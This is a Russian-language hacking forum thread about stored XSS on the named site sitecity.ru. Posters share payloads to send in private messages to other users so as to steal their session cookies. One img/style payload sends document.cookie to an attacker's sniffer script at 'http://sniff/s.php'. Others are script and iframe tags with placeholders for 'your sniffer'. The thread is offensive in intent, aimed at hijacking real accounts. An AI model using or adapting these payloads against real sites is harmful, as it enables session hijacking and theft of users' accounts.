![]() |
Имеем аккаунт на sitecity.ru (активная XSS)
Вот две XSS, позволяющие стянуть кукисы с помощью ядовитого письма. (отсылается, когда заходишь под своим аккаунтоми - шлёшь на чужой логин)
<script src="javascript:alert(/ваш сниффер/);"></script> <iframe BORDER=0 HEIGHT=0 WIDTH=0 src="javascript:alert(/для сниффера тоже/);"></iframe> |
Щас испробуем..............
|
Отрывок из моей статьи, кторую я все обещаю выложить, да все никак руки не доходят ))
любой банальный XSS скрипт в ЛС, например: Код:
<img src="http://sasa" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)">PHP код:
Еще хочу заметить, что на этом, баги не заканчиваются)) Так же, прочитавших это, по человечески прошу никогда не делать подобное: http://xss.h16.ru/my_papers_sitecity/14.gif |
| Время: 01:52 |